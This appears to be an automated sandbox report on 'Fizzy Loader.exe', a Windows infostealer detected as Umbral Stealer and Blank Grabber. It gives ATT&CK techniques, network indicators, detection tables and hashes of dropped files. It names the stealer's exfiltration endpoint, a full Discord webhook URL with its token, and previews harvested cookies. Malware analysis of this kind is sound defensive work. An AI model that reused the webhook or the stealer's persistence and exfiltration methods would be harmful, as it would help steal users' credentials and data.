Credentials | Domains | Default Accounts | 11 Command and Scripting Interpreter | 12 Registry Run Keys / Startup Folder | 11 Process Injection | 21 Disable or Modify Tools | LSASS Memory | 1 Query Registry | Remote Desktop Protocol | 2 Data from Local System | 21 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 PowerShell | Logon Script (Windows) | 12 Registry Run Keys / Startup Folder | 11 Obfuscated Files or Information | Security Account Manager | 211 Security Software Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Timestomp | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 15 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 41 Virtualization/Sandbox Evasion | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 File Deletion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Masquerading | DCSync | 11 Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 41 Virtualization/Sandbox Evasion | Proc Filesystem | 11 System Network Configuration Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 11 Process Injection | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (figure not reproduced). Behavior Graph ID: 1582592, Sample: Fizzy Loader.exe, Startdate: 31/12/2024, Architecture: WINDOWS, Score: 100
Processes shown: Fizzy Loader.exe, which started powershell.exe, cmd.exe and 9 other processes; descendants include WmiPrvSE.exe, conhost.exe and PING.EXE.
DNS/IP shown: ip-api.com 208.95.112.1 (TUT-ASUS, United States); discord.com 162.159.138.232 (CLOUDFLARENETUS, United States).
Dropped files shown: C:\ProgramData\Microsoft\...\ukUGV.scr (PE32); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\...\Fizzy Loader.exe.log (ASCII); C:\ProgramData\...\ukUGV.scr:Zone.Identifier (ASCII).
Signatures shown: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); Suspicious powershell command line found; Found many strings related to Crypto-Wallets (likely being stolen); Self deletion via cmd or bat file; Loading BitLocker PowerShell Module; Uses ping.exe to check the status of other devices and networks.

Source | Detection | Scanner | Label | Link
Fizzy Loader.exe | 74% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer |
Fizzy Loader.exe | 100% | Avira | HEUR/AGEN.1307507 |
Fizzy Loader.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | 100% | Avira | HEUR/AGEN.1307507 |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | 100% | Joe Sandbox ML | |
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr | 74% | ReversingLabs | ByteCode-MSIL.Trojan.UmbralStealer |
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discord.com | 162.159.138.232 | true | false | | high
ip-api.com | 208.95.112.1 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx | false | | high
http://ip-api.com/line/?fields=hosting | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
208.95.112.1 | ip-api.com | United States | 53334 | TUT-ASUS | false
162.159.138.232 | discord.com | United States | 13335 | CLOUDFLARENETUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1582592
Start date and time: 2024-12-31 00:49:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 30
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Fizzy Loader.exe
Detection: MAL
Classification: mal100.troj.adwa.spyw.evad.winEXE@40/24@3/2
EGA Information:
• Successful, ratio: 16.7%
HCA Information:
• Successful, ratio: 67%
• Number of executed functions: 224
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 142.250.185.195, 52.149.20.212, 13.107.246.45
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 1892 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 428 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 5688 because it is empty
• Execution Graph export aborted for target powershell.exe, PID 6156 because it is empty
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: Fizzy Loader.exe
Time | Type | Description
18:49:52 | API Interceptor | 5x Sleep call for process: WMIC.exe modified
18:49:55 | API Interceptor | 28x Sleep call for process: powershell.exe modified
18:49:56 | API Interceptor | 6578x Sleep call for process: Fizzy Loader.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
208.95.112.1 | Extreme Injector v3.exe | malicious | XWorm | ip-api.com/line/?fields=hosting
208.95.112.1 | VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | ip-api.com/json/?fields=61439
208.95.112.1 | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | ip-api.com/json/
208.95.112.1 | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | ip-api.com/json/?fields=61439
208.95.112.1 | 987656789009800.exe | malicious | AgentTesla | ip-api.com/line/?fields=hosting
208.95.112.1 | good.exe | malicious | PureLog Stealer, zgRAT | ip-api.com/json/
208.95.112.1 | Client-built.exe | malicious | Quasar | ip-api.com/json/
208.95.112.1 | DHL AWB-documents.lnk | malicious | Divulge Stealer | ip-api.com/json/?fields=225545
208.95.112.1 | main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | ip-api.com/json/8.46.123.189?fields=192511
208.95.112.1 | main.exe | malicious | Unknown | ip-api.com/json/8.46.123.189?fields=192511
162.159.138.232 | dsoft.exe | malicious | Python Stealer, Creal Stealer |
162.159.138.232 | DHL AWB-documents.lnk | malicious | Divulge Stealer |
162.159.138.232 | http://mee6.xyz | malicious | Unknown |
162.159.138.232 | webhook.exe | malicious | Unknown |
162.159.138.232 | chos.exe | malicious | Unknown |
162.159.138.232 | apDMcnqqWs.exe | malicious | Unknown |
162.159.138.232 | Cooperative Agreement0000800380.docx.exe | malicious | Babadeda, Blank Grabber |
162.159.138.232 | speedymaqing.exe | malicious | Python Stealer, Discord Token Stealer |
162.159.138.232 | RuntimeusererVers.exe | malicious | Python Stealer |
162.159.138.232 | file.exe | malicious | CStealer |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
discord.com | Jx6bD8nM4qW9sL3v.exe | malicious | Unknown | 162.159.128.233
discord.com | dsoft.exe | malicious | Python Stealer, Creal Stealer | 162.159.138.232
discord.com | DHL AWB-documents.lnk | malicious | Divulge Stealer | 162.159.138.232
discord.com | http://mee6.xyz | malicious | Unknown | 162.159.138.232
discord.com | YF3YnL4ksc.exe | malicious | Unknown | 162.159.136.232
discord.com | YF3YnL4ksc.exe | malicious | Unknown | 162.159.136.232
discord.com | arm.elf | malicious | Unknown | 162.159.137.232
discord.com | webhook.exe | malicious | Unknown | 162.159.138.232
discord.com | zapret.exe | malicious | Unknown | 162.159.136.232
discord.com | Bloxflip Predictor.exe | malicious | Njrat | 162.159.137.232
ip-api.com | Extreme Injector v3.exe | malicious | XWorm | 208.95.112.1
ip-api.com | VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
ip-api.com | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 208.95.112.1
ip-api.com | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
ip-api.com | 987656789009800.exe | malicious | AgentTesla | 208.95.112.1
ip-api.com | good.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
ip-api.com | Client-built.exe | malicious | Quasar | 208.95.112.1
ip-api.com | DHL AWB-documents.lnk | malicious | Divulge Stealer | 208.95.112.1
ip-api.com | main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | 208.95.112.1
ip-api.com | main.exe | malicious | Unknown | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | Loader.exe | malicious | Meduza Stealer | 104.26.13.205
CLOUDFLARENETUS | https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Set-up.exe | malicious | LummaC, GO Backdoor, LummaC Stealer | 188.114.97.3
CLOUDFLARENETUS | Setup.exe | malicious | LummaC | 172.67.177.88
CLOUDFLARENETUS | X-mas_2.3.2.exe | malicious | LummaC | 172.67.190.223
CLOUDFLARENETUS | ReploidReplic.exe | malicious | LummaC | 104.21.48.1
CLOUDFLARENETUS | https://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/ | malicious | Unknown | 1.1.1.1
CLOUDFLARENETUS | Launcher.exe | malicious | LummaC | 104.21.96.1
CLOUDFLARENETUS | GTA-5-Mod-Menu-2025.exe | malicious | LummaC | 104.21.96.1
CLOUDFLARENETUS | AquaDiscord-2.0.exe | malicious | LummaC | 104.21.16.1
TUT-ASUS | Extreme Injector v3.exe | malicious | XWorm | 208.95.112.1
TUT-ASUS | VegaStealer_v2.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
TUT-ASUS | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig | 208.95.112.1
TUT-ASUS | SharcHack.exe | malicious | Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer | 208.95.112.1
TUT-ASUS | 987656789009800.exe | malicious | AgentTesla | 208.95.112.1
TUT-ASUS | good.exe | malicious | PureLog Stealer, zgRAT | 208.95.112.1
TUT-ASUS | http://au.kirmalk.com/watch.php?vid=7750fd3c8 | malicious | Unknown | 162.252.214.4
TUT-ASUS | Client-built.exe | malicious | Quasar | 208.95.112.1
TUT-ASUS | DHL AWB-documents.lnk | malicious | Divulge Stealer | 208.95.112.1
TUT-ASUS | main.exe | malicious | Python Stealer, Discord Token Stealer, PRYSMAX STEALER | 208.95.112.1
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Epsilon.exe | malicious | Unknown | 162.159.138.232
 | XClient.exe | malicious | XWorm | 162.159.138.232
 | hoEtvOOrYH.exe | malicious | SmokeLoader | 162.159.138.232
 | web44.mp4.hta | malicious | LummaC | 162.159.138.232
 | random.exe | malicious | LummaC | 162.159.138.232
 | eXbhgU9.exe | malicious | LummaC | 162.159.138.232
 | Supplier.bat | malicious | Unknown | 162.159.138.232
 | Supplier.bat | malicious | LodaRAT, XRed | 162.159.138.232
 | NEW-DRAWING-SHEET.bat | malicious | Unknown | 162.159.138.232
 | Requested Documentation.exe | malicious | MassLogger RAT, PureLog Stealer | 162.159.138.232
                                                                                                                                                          No context
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):235008
                                                                                                                                                          Entropy (8bit):6.0522746277225234
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:dloZM+rIkd8g+EtXHkv/iD4M7+QWRJ6RvSgR1E9/gF8e1mfIi:/oZtL+EP8M7+QWRJ6RvSgR1Ecqx
                                                                                                                                                          MD5:B56AF795F8B7EDC6F35A9E905921ED0E
                                                                                                                                                          SHA1:C82CB0088BC9C93FD9A491AD278F410D44265A4D
                                                                                                                                                          SHA-256:46A67CDC899F61CCB6324D187D56B389F720D72BEB02594FD60FDC4A8CA62AB4
                                                                                                                                                          SHA-512:C35B429E243845337903FA5CC6853C6921514B2FCD84E7788607AA47414BE9B2101C8B87ACD1766666DAA7FC0CDD2B7A5BE19AC5754DB8F12C3E262EA792F9C6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: Joe Security
                                                                                                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: ditekSHen
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):26
                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):1965
                                                                                                                                                          Entropy (8bit):5.377802142292312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                                                                                          MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                                                                                          SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                                                                                          SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                                                                                          SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):64
                                                                                                                                                          Entropy (8bit):0.34726597513537405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Nlll:Nll
                                                                                                                                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):689108
                                                                                                                                                          Entropy (8bit):7.997921795505862
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:12288:C9WQAbzEZxsQtYDGj/yXRH5cJ/SmzmKPkzscO+GGwySal9gRjbwHbkXEBuJ9:C92bzexsQyGCcJ/SYmKlcSdySq9u4I9
                                                                                                                                                          MD5:524A9B8398F470C54145EB5C59D0361B
                                                                                                                                                          SHA1:4B3CB65997E121B872BB3443E650DC28C7D72550
                                                                                                                                                          SHA-256:E7D1E40C174C64EE3A9212C14C459F38A3C9A6BCEDA79BCD09270905D93E3016
                                                                                                                                                          SHA-512:47A2A618953E975823ADE85FCBCF064CA5ABE4B21A1B8ADF5AD38785FAFD311A2D21ABB753697EDA5275E98A6835FAF6003A84DB0809D17288E57D6D4FD94C77
                                                                                                                                                          Malicious:false
Preview: Zip archive (PK) data; readable entry names: Browsers\Cookies\Chrome Cookies.txt, Display\Display.png
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):289
                                                                                                                                                          Entropy (8bit):5.76524051718901
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:Pk3rcDxbuQ03r4KcsGG1NOpFw+5uQ+Cy8HfyUhEqXfL6vRpAy:c7EEQ074KcW1NOpFwUuQLHaU9WvH9
                                                                                                                                                          MD5:B11F445211C21DB45D7B779A5C6E2444
                                                                                                                                                          SHA1:27641DD5D8824CD6596FB862681846DAE17A8BBB
                                                                                                                                                          SHA-256:11CB0CB1CC5B9BAF4FFB0F950F667FBCC688979D5096DEDCE9883242990955FC
                                                                                                                                                          SHA-512:A504B9E59E392209298C2E3113FB06DF75167FD2B36D69BA408BC6BA682D47F015656B06AE270928A7BEF685705E28C20E85786B53DFC308F6952984EA6FC2A0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.google.com.TRUE./.FALSE.13343492415760663.1P_JAR.2023-10-04-13...google.com.TRUE./.FALSE.13356711615760707.NID.511=Ef5vPFGw-MZYo5hwe-0ThAVslbxbmvdVZwcHnqVzWHAU14v53MN1VvwvQq8baYfg2-IAtqZBV5NOL5rvj2NWIqrz377UhLdHtOgE-tJaBlUBYJEhuGsQdqni3oTJg0brqv1djdiLJyvTSUhdK-c5JWadCSsULPLzhSx-F-6wOg4..
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):706275
                                                                                                                                                          Entropy (8bit):7.92694203733703
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:sN5If7hE5vUZevY31R2XSefNY396zj9Z6E5gU/59l0vS38V+IxXPOM:tf7wU31RySeC0zj9jgUxuVDWM
                                                                                                                                                          MD5:235FC0F05C4D9DD834F7BF53F7EFB657
                                                                                                                                                          SHA1:659097888EFEE8E7E1D99776C7C995F4E98A42A4
                                                                                                                                                          SHA-256:8C4E950B998DA9439FAB44016F25239BE3B3FBE4F56F4CE82E65AFFD5FE9598E
                                                                                                                                                          SHA-512:AB465130A3E3FB04AE47FC525A247966E22DCFDCA7995FB4237B6D51827E0C0A3F5083F22EE46C6D30D45CF258F0E35C43D7829B52E9F3349C6E6E9B669B802A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):40960
                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51200
                                                                                                                                                          Entropy (8bit):0.8746135976761988
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                          MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:SQLite format 3
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):60
                                                                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):0.6732424250451717
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                          MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20480
                                                                                                                                                          Entropy (8bit):0.8439810553697228
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                          MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                          SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                          SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                          SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:ASCII text, with CRLF, LF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2223
                                                                                                                                                          Entropy (8bit):4.573013811987098
                                                                                                                                                          Encrypted:false
